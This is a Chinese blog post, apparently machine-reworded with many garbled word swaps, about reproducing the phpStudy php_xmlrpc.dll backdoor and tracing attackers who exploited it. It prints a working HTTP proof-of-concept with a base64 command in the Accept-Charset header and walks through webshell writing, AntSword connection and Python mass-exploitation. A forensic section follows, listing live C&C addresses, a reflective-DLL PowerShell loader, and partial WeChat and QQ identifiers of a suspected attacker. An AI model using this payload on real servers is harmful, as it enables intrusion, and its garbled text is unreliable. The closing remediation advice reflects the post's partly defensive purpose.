您现在的位置是:首页 > 密码破解

phpStudy远程RCE系统漏洞复现及其失陷服务器侵入溯源剖析

作者:果E安全网时间:2020-10-23 21:02:36分类:密码破解

简介诸位联合利华信息平台网观众们的外公各位好!,我是艾登——皮尔斯(玩看门狗1情况下申请注册的ID),近期安全圈好不热闹,中国北京时间9月20日“杭州公安”官方微博公布了“杭州市警情通报严厉打击涉网违法违纪暨'清网2019'

诸位联合利华信息平台网观众们的外公各位好!,我是艾登——皮尔斯(玩看门狗1情况下申请注册的ID),近期安全圈好不热闹,中国北京时间9月20日“杭州公安”官方微博公布了“杭州市警情通报严厉打击涉网违法违纪暨'清网2019'专项整治战绩”文章,该“后门”没法被电脑杀毒软件扫描仪删掉,而且藏匿于手机软件某多功能性编码中,不易被发觉具备免杀特性。比较严重的威协来到互联网技术的室内空间安全性,让很多的互联网技术情侣网名的私人信息信息内容遭受存有大规模泄漏的风险性,本文分成文图实例教程和教程视频(文章内容结尾)。

文章内容文件目录:

1.phpstudy后门检验

2.phpstudy远程RCE后门复现文图实例教程

3.phpstudy远程RCE后门复现教视頻程

3.Python撰写复现脚本制作

4.Python撰写大批量复现脚本制作

5.对于布署phpstudy自然环境网络服务器已失陷的服务器开展溯源剖析/黑客攻击肖像

6.恢复提议

7.参照

提前准备专用工具:

VMware Workstation Pro

Windows7的/ 2008R2

BurpSuiteFree

phpStudy20161103.zip(原文中应用)phpStudy20180211.zip

Python

(1)phpStudy20161103?后门部位存有于:

*:\\phpStudy\\php\\php-5.2.17\\ext\\php_xmlrpc.dll

*:\\phpStudy\\php\\php-5.2.17\\ext\\php_xmlrpc.dll

(2)phpStudy20180211后门部位存有于:

*:\\PHPTutorial\\PHP\\PHP-5.2.17\\ext\\php_xmlrpc.dll

*:\\PHPTutorial\\PHP\\PHP-5.4.45\\ext\\php_xmlrpc.dll

(3)寻找“ php_xmlrpc,dll”后用文本文档开启,“ Ctrl F”检索“?@eva?”字符串数组假如存有就存有后门:

(4)Phpstudy后门剖析文章内容传送器:

https://www.联合利华信息平台网.com/news/topnews/214912.html

https://www.cppentry.com/bencandy.php?fid=85&id=261791

(1)vm虚拟机构建好Phpstudy自然环境,我这里应用的是phpstudy2016版本号

Phpstudy自然环境192.168.1.91

(2)电脑浏览器浏览吊舱详细地址:http://192.168.1.91/

(3)浏览器当地代理商而且开启BurpSuiteFree抓包软件

(4)phpstudy RCE POC:

GET / HTTP/1.1

Host: 192.168.43.99

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml xml,application/xml;q=0.9,**;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset:?c3lzdGVtKCd3aG9hbWknKTs=

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

(whoami实行結果)

(net user执行查询查看查看查看結果)

(7)载入webshel升的实际操作

能够应用待办事宜指令下ECHO?完成

系统软件(“ write_webshell”);

(8)详细写成webshel升的句子:

(10)拼凑后的句子

(11)拼凑好Base64 编号后的编码:

(取得成功载入的webshel)

(中国蚁剑联接取得成功)

(中国蚁剑连接的webshel升指令实行取得成功)

(12)视頻复现:

(1)Python 撰写Phpstudy2016 / 2018远程RCE运用脚本制作编码:

(2)我们可以见到上边的这一Python复现phpstudy远程RCE的脚本制作对于于单一指令的phpstudy布署的网站比如这类页面额的还较为便捷,如果我们不清楚绝对路径是否就不可以载入webshell了?实际上这并不会!!!!

(3)对于于phpstudy表针网页页面无法打开的大家实际上能够枚举类型一下他的物理学途径详细地址就可以,不清楚绝地求生途径能够枚举类型一下物理学的肯定了解

随后把目录中的绝地求生详细地址原素传到涵数中递归要求分辨就可以,这儿也不贴出编码了。

(4)此外诸位老表在开展枚举类型检验,可是做为一个白帽,千万别翻过红杠。提议大伙儿检验的情况下不必载入一句话木马,立即写成一个phpinfo();比较好也是维护了自身。

(5)Python脚本制作复现Phpstudy 2016/2018远程RCE系统漏洞实际效果:

(1)我还在开展任意检验phpstudy的情况下早已发觉了一部分感柒服务器被黑帽SEO运用了,用以提升百度搜索引擎关键字的排行来吸引住总流量。

(2)一部分检验到存有系统漏洞phpstudy服务器网址根目录下高频率出現的php一句话木马文件夹名称以下:

(3)下边的这三位愚兄(大网络黑客)便是根据了echo的方法载入了webshell一句话木马到网址的根目录下开展连接,先放进一边后边在一起做后门调查取证。

(4)异类的后门“lishunsheng.php”应该是一个人名的拼音,应该是李姓式的。

(5)破译后

(6)写成文件夹名称为"text.php"连接登陆密码为“c”的webshell一句话木马到网址根目录下方

(7)也有别的的网络黑客是根据phpmyadmin登陆弱口令登陆密码的系统软件日志文件载入webshell进去的

今年9月23日17时30分33秒载入

今年9月23日18时16分33秒载入webshell

照片转载腾讯电脑大管家

(8)上边在9月23日载入webshell一句话后,大网络黑客又根据一句话木马webshell提交了一个文件夹名称为“001122.php”的webshell死不了马基础能够先贴个标识是同一个大网络黑客的进攻侵入个人行为,在这儿还可以看得出phpstudy一键布署应当把phpmyadmin的默认设置登陆密码给改动成随机字符串,先前就会有安全性精英团队对于此难题被灰产大批量getshell的主题活动开展了剖析。

(1)大家如今早已取得了这些网络黑客的的webshell一句话后门文档如今就需要刚开始溯源网络黑客的IP地址,emmmmm,因为我不能立即登陆受感柒的服务器查询浏览日志文件,那麼这便会十分的难堪,可是我忽然想到了以前我以前给广东某地的互联网稽查组织干了一个用于纪录网络黑客浏览webshell一句话情况下的IP地址的脚本制作,而且根据电子邮件或是手机微信把信息内容发给稽查人。

(2)可是在检验以前我需要对她们的webshell一句话木马做一下生产加工解决,网络黑客原来留有的webshell编码以下:

(3)大家生产加工解决网络黑客留有的后的webshell编码以下

(4)log.html的途径详细地址能够改动到储放到网址根目录下的其他文件下,防止被发觉哈哈哈哈哈,

当网络黑客应用中国菜刀/中国蚁剑浏览webshell的情况下便会纪录下IP地址/浏览時间/要求一等信息内容到log.html文档中

(5)模拟黑客浏览webshell前

(6)模拟黑客浏览websell后

(7)随后当地或是VPS上定时执行浏览要求log.html把全新的访问信息根据Email电子邮件的方法发给执法机关/溯源技术工程师,

(8)浏览检验早已能够做到了秒级,時间的精密度也是十分之高。随后就给所有网络黑客的webshell生产加工一下,随后我们在启用当地的脚本制作应用一个高并发的要求去要求全部的网站log.html静静地等候电子邮件就可以。可是这儿并不建议高并发要求非常容易被服务器防火墙封禁IP,因此 我也应用了单线进程方式而且应用tiime控制模块的time.sle ep设置了请求延迟,我设置了10秒访问一次。

  (9)设置完毕之后就可以直接运行监听脚本了

  

  (10)在经过十多个小时的等待,我终于等待到了那些大黑客重新访问他们预留下来的Webshell地址了,手机QQ邮箱也收到了邮件通知

  

  

  (11)本次等待共获取到144条webshell访问记录,主要的访问IP地址如下:

  IP地址 归属地 149.129.98.81 香港 阿里云 23.223.201.26 美国乔治亚州亚特兰大 72.21.81.189 美国 加利福尼亚

  (12)此外我还注意到网站的根目录文件夹下方被上传了远程木马病毒(方便黑客后期长时间维持权限访问)如下图:

  那么接下来就是进行给黑客入侵画像:

  (1)Windows7 64bit System 虚拟机样本未运行初始化状态

  

  (2)执行cd.exe程序后本地端口49189端口被占用,链接的外部C&C的上线地址:114.67.65.156:8081

  

  (3)查壳:

  

  UPX压缩壳使用C++编写的win32木马程序

  (1)运行后会删除自身文件(cd.exe)并且会复制自身到C:\Windows下方

  

  

  

  C:\Windows\system32\cmd.exe" /c?del C:\Users\ADMINI~1\Desktop\cd.exe > null

  删除母体

  

  写入木马文件到C:\Windows\目录下

  (2)注册行为:修改了以下注册表以此降低Internet安全设置。

  

  

  (3)向网关地址发送数据包:

  

  腾讯安全御见威胁情报中心撰写了的分析文章报告

  (4)与114.67.65.156:8081C&C上线服务器地址建立TCP通信链接

  

  

  ?114.67.65.156主机3389端口开放(Windows主机无疑)

  

  (5)开启了web服务80端口访问IP发现有一个网站

  

  (6)发现是一个做SEO的泛微目录的站点,留意到网站上面留下了这个站长的微信二维码

  

  

  微信号尾号为H****553YM

  QQ:64****08

  就先叫他53YM大黑客

  

  (7)纯真IP库查询IP的归属地指向了一家名为"北京市 凯达永易科技(北京)有限公司"的公司

  去天眼查网站查询这家公司发现公司已注销

  

  

  天眼查查询地址

  (8)然后我顺便去Google搜索了一下这个C&C上线地址,发现已经有安全团队分析了类似样本

  

  腾讯安全御见威胁情报中心样本分析报告

  

  2018.exe?211.149.225.80:3313(大灰狼木马)

  inJoin.ps1是一个远程注入工具该PowerShell脚本具有3个基本功能集:

  1.)将DLL反映性地加载到PowerShell进程中

  远程或本地运行时,可以将DLL输出返回给用户。

  DLL完成执行后,清理PS进程中的内存。

  2.)将EXE反射性地加载到PowerShell进程中。

  远程运行时无法将EXE输出返回给用户。如果需要远程输出,则必须使用DLL。如果在本地运行,则可以返回EXE输出。

  DLL完成执行后,清理PS进程中的内存。

  非常适合运行EXE的现有渗透测试工具,而无需触发过程监控警报。

  3.)以反射方式将DLL注入到远程进程中。

  在远程或本地运行时,无法将DLL输出返回给用户。

  如果DLL完成执行,则不清理远程进程中的内存。

  非常适合通过将后门DLL注入另一个进程内存来在系统上植入后门。

  期望DLL具有此功能:void VoidFunc()。这是在DLL加载后将被调用的函数。

  如果通俗点用人话来讲就是利用PowerShell来远程注入DLL的脚本

  此PowerShell项目的Github项目地址:

  https://github.com/clymb3r/PowerShell

  此PowerShell项目作者的说明:

  https://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/

  

  这里的江西赣州的黑客所使用的就是上图红圈选圈中的PowerShell脚本

  然后查看他一下他的PowerShell脚本

  

  其中$InputString是黑客把自己的恶意的二进制文件通过Base64转写后的字符串信息

  在通过PowerShell[System.Convert]::FromBase64String的方法是为上面二进制文件加密的字符串信息进行解密执行

  InputString中Base64编码的字符串解密还原后为Metasploit生成的二进制文件。

  PowerShell还原解密方式:

  C#还原解密方式:

  

  这个江西赣州的黑客够专业我喜欢

  

  inJoin.ps1 上线地址为117.21.224.222:9898

  木马文件名及上线地址如下图所示:

  木马文件名字 C&C上线地址 归属地 2018.exe 211.149.225.80:3313 中国四川绵阳 cd.exe 114.67.65.156:8081 中国上海京东云 inJoin.ps1 117.21.224.222:9898 中国江西赣州 Index.php 无(黑客后期上传大马,未抓取IP地址) 无

  1.前往官网下载phpstudy下载最新版本

  2.修改服务器密码,检查系统日志文件,下载安装火绒杀毒软件进行全盘查杀病毒后门,以防生产环境被入侵者留下后门

  2.开发人员应该尽量在生产环境中杜绝使用一键部署类型的软件和脚本防止软件留有后门,导致服务器病毒木马入侵

  3.关注多一些风险预警平台"微步"/或者关注威胁情报收集的微信公众号"黑鸟"还有就是我的winway-鱼蛋师傅的漏洞挖掘公众号"快识"。

  phpStudy后门简要分析:

  http://www.宝洁信息网.com/others-articles/215406.html

  数十万PhpStudy用户被植入后门,快来检测你是否已沦为“肉鸡”!:

  https://www.宝洁信息网.com/news/topnews/214912.html

  杭州警方通报打击涉网违法犯罪暨'净网2019'专项行动战果

  https://mp.weixin.qq.com/s/s-5cVTxIJcDfdRjtnEnI0g

  病毒团伙利用phpStudy RCE漏洞批量抓鸡,下发四个远控木马

  https://www.4hou.com/system/20637.html

  渗透技巧——通过cmd上传文件的N种方法

  https://wooyun.js.org/drops/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7%E2%80%94%E2%80%94%E9%80%9A%E8%BF%87cmd%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E7%9A%84N%E7%A7%8D%E6%96%B9%E6%B3%95.html

  *本文原创作者:艾登——皮尔斯,本文属于宝洁信息网原创奖励计划,未经许可禁止转载

郑重声明:

果E安全网所有活动均为互联网所得,如有侵权请联系本站删除处理,转载请注明本站地址。

我来说两句